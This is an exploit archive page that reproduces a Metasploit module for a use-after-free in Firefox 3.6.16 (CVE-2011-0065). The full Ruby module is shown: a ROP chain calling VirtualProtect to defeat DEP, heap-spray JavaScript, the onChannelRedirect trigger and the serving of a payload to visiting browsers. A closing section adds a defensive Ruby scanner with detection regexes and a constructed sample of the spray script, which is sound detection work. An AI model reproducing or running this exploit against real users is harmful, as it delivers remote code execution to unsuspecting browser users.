Mozilla Firefox 3.6.16 mChannel Use After Free

Posted Aug 10, 2011
Authored by regenrecht, Rh0 | Site metasploit.com

This Metasploit module exploits a use-after-free vulnerability in Mozilla Firefox 3.6.16. An OBJECT element's mChannel can be freed via the OnChannelRedirect method of the nsIChannelEventSink interface. mChannel then becomes a dangling pointer and is reused when the OBJECT's data attribute is set. The module uses a heap spray with a minimal ROP chain to bypass DEP on Windows XP SP3.

tags | exploit
systems | windows
advisories | CVE-2011-0065, OSVDB-72085
SHA-256 | 5a6e9352732f91f5a6195ee7559b47f8ad02806dc4da4347ae745625e1ce1deb

##
# $Id: mozilla_mchannel.rb 13507 2011-08-10 05:58:02Z sinn3r $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::HttpServer::HTML

	include Msf::Exploit::Remote::BrowserAutopwn
	autopwn_info({
		:ua_name    => HttpClients::FF,
		:ua_minver  => "3.6.16",
		:ua_maxver  => "3.6.16",
		:os_name    => OperatingSystems::WINDOWS,
		:javascript => true,
		:rank       => NormalRanking,
	})

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Mozilla Firefox 3.6.16 mChannel use after free vulnerability',
			'Description'    => %q{
					This module exploits a use after free vulnerability in Mozilla
				Firefox 3.6.16. An OBJECT Element mChannel can be freed via the
				OnChannelRedirect method of the nsIChannelEventSink Interface. mChannel
				becomes a dangling pointer and can be reused when setting the OBJECT's
				data attribute. (Discovered by regenrecht). This module uses heapspray
				with a minimal ROP chain to bypass DEP on Windows XP SP3.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'regenrecht', # discovery
					'Rh0'         # metasploit module
				],
			'Version'        => "$Revision: 13507 $",
			'References'     =>
				[
					['CVE', '2011-0065'],
					['OSVDB', '72085'],
					['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=634986'],
					['URL', 'http://www.mozilla.org/security/announce/2010/mfsa2011-13.html']
				],
			'DefaultOptions' =>
				{
					'EXITFUNC'             => 'process',
					'InitialAutoRunScript' => 'migrate -f',
				},
			'Payload'        =>
				{
					'Space' => 1024,
				},
			'Targets'        =>
				[
					[
						'Firefox 3.6.16 on Windows XP SP3',
						{
							'Platform' => 'win',
							'Arch'     => ARCH_X86,
						}
					],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'May 10 2011'
		))
	end

	def on_request_uri(cli, request)
		# Re-generate the payload
		return if ((p = regenerate_payload(cli).encoded) == nil)

		print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
		send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' })

		# Handle the payload
		handler(cli)
	end

	def generate_html(payload)
		# DEP bypass using xul.dll
		custom_stack = [
			0x1052c871, # mov esp,[ecx] / mov edx,5c86c6ff add [eax],eax / xor eax,eax / pop esi / retN 0x8
			0x7c801ad4, # VirtualProtect
			0xbeeff00d,
			0xbeeff00d,
			0x1003876B, # jmp esp
			0x0c0c0048, # start address
			0x00000400, # size 1024
			0x00000040, # Page EXECUTE_READ_WRITE
			0x0c0c0c00  # old protection
		].pack("V*")

		payload_buf = ''
		payload_buf << custom_stack
		payload_buf << payload
		escaped_payload = Rex::Text.to_unescape(payload_buf)

		# Random JavaScript variable names
		js_element_name     = rand_text_alpha(rand(10) + 5)
		js_obj_addr_name    = rand_text_alpha(rand(10) + 5)
		js_sc_name          = rand_text_alpha(rand(10) + 5)
		js_ret_addr_name    = rand_text_alpha(rand(10) + 5)
		js_chunk_name       = rand_text_alpha(rand(10) + 5)
		js_final_chunk_name = rand_text_alpha(rand(10) + 5)
		js_block_name       = rand_text_alpha(rand(10) + 5)

		# Reference: adobe_flashplayer_newfunction.rb
		custom_js = <<-JS
		#{js_element_name} = document.getElementById("d");
		#{js_element_name}.QueryInterface(Components.interfaces.nsIChannelEventSink).onChannelRedirect(null,new Object,0);
		#{js_obj_addr_name} = unescape("\\x0c%u0c0c");

		var #{js_sc_name} = unescape("#{escaped_payload}");
		var #{js_ret_addr_name} = unescape("%u0024%u0c0c");
		while(#{js_ret_addr_name}.length+20+8 < 0x100000) {#{js_ret_addr_name} += #{js_ret_addr_name};}
		var #{js_chunk_name} = #{js_ret_addr_name}.substring(0,(0x48-0x24)/2);
		#{js_chunk_name} += #{js_sc_name};
		#{js_chunk_name} += #{js_ret_addr_name};
		var #{js_final_chunk_name} = #{js_chunk_name}.substring(0,0x10000/2);
		while (#{js_final_chunk_name}.length<0x800000) {#{js_final_chunk_name} += #{js_final_chunk_name};}
		var #{js_block_name} = #{js_final_chunk_name}.substring(0,0x80000 - (0x1020-0x08)/2);
		array = new Array()
		for (n=0;n<0x1f0;n++){
		array[n] = #{js_block_name} + #{js_sc_name};
		}

		#{js_element_name}.data = "";
		JS

		# Remove the extra tabs
		custom_js = custom_js.gsub(/^\t\t/, '')

		html = <<-HTML
		<html>
		<body>
		<object id="d"><object>
		<script type="text/javascript">
		#{custom_js}
		</script>
		</body>
		</html>
		HTML

		return html
	end

end
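The generated JavaScript above contains several indicators a defender can match on in proxy logs or a web-content sandbox: the QueryInterface-to-nsIChannelEventSink call followed by onChannelRedirect, the %u0c0c address pattern, the string-doubling loops that build the spray blocks, the long %u-escaped blob handed to unescape(), the for-loop that fills an Array with copies of the block, and the final assignment to the OBJECT element's data attribute that touches the freed mChannel. The following Ruby script is an added detection example written for this page; it is not part of the Metasploit module. The regular expressions are heuristics of my own, and the two sample pages are constructed (the variable names and the %u4141 blob are made up and not taken from the module).

```ruby
# Heuristic scanner for the mChannel trigger and heap-spray idioms visible in the
# module's generated JavaScript. Added example, not code from the Metasploit module.
# Each signature is a hand-written heuristic; tune the thresholds for your traffic.
SIGNATURES = {
  # QueryInterface(...nsIChannelEventSink).onChannelRedirect(...) called from page script
  :channel_redirect_trigger => /nsIChannelEventSink\s*\)\s*\.\s*onChannelRedirect\s*\(/,
  # 0x0c0c0c0c-style address encoded as a %u escape
  :addr_0c0c_sled           => /%u0c0c/i,
  # "while (x.length ... < 0x...) { x += x; }" string doubling used to build spray blocks
  :string_doubling_loop     => /while\s*\(\s*(\w+)\.length[^)]*<\s*0x[0-9a-f]+\s*\)\s*\{\s*\1\s*\+=\s*\1\s*;?\s*\}/i,
  # a long %u-encoded blob passed through unescape(), as the ROP stack plus payload is
  :long_unescape_blob       => /unescape\(\s*"(?:%u[0-9a-f]{4}){8,}"\s*\)/i,
  # a for loop that fills an Array with "block + shellcode" copies
  :array_fill_loop          => /for\s*\([^)]*\)\s*\{\s*\w+\[\w+\]\s*=\s*\w+\s*\+\s*\w+\s*;?\s*\}/,
  # assignment to an element's data attribute after the trigger (reuse of the freed object)
  :object_data_reuse        => /\.data\s*=\s*""\s*;/,
}

SPRAY_SIGNATURES = [:addr_0c0c_sled, :string_doubling_loop, :long_unescape_blob, :array_fill_loop]

# Returns a hash of signature name => number of matches, omitting signatures that did not fire.
def scan_script(text)
  SIGNATURES.each_with_object({}) do |(name, re), hits|
    n = text.scan(re).size
    hits[name] = n if n > 0
  end
end

# Collapses the hit counts into a verdict. The redirect trigger plus two or more spray
# indicators is the strongest signal; spray indicators alone still deserve a look.
def classify(text)
  hits = scan_script(text)
  return :clean if hits.empty?
  spray_hits = (hits.keys & SPRAY_SIGNATURES).size
  if hits.key?(:channel_redirect_trigger) && spray_hits >= 2
    :mchannel_uaf_exploit_suspected
  elsif spray_hits >= 2
    :heap_spray_suspected
  else
    :suspicious_low
  end
end

# Constructed sample mimicking the shape of the generated script (names and bytes are made up).
SAMPLE_PAGE = <<~'JS'
  el = document.getElementById("d");
  el.QueryInterface(Components.interfaces.nsIChannelEventSink).onChannelRedirect(null,new Object,0);
  var sc = unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141");
  var ret = unescape("%u0024%u0c0c");
  while(ret.length+20+8 < 0x100000) {ret += ret;}
  var chunk = ret.substring(0,(0x48-0x24)/2);
  chunk += sc;
  chunk += ret;
  var fin = chunk.substring(0,0x10000/2);
  while (fin.length<0x800000) {fin += fin;}
  var block = fin.substring(0,0x80000 - (0x1020-0x08)/2);
  array = new Array()
  for (n=0;n<0x1f0;n++){
  array[n] = block + sc;
  }
  el.data = "";
JS

# Constructed benign sample: ordinary string building that should not trip the heuristics.
BENIGN_PAGE = <<~'JS'
  var s = unescape("%u00e9");
  while (s.length < 0x10) { s += "a"; }
  document.getElementById("out").textContent = s;
JS

if __FILE__ == $0
  [SAMPLE_PAGE, BENIGN_PAGE].each do |page|
    puts "#{classify(page)}: #{scan_script(page).inspect}"
  end
end
```

The scanner works on decoded page text, so run it after any gzip or chunked transfer decoding; it will not see through an additional layer of JavaScript obfuscation, which is the main reason to keep the verdict tiered rather than binary.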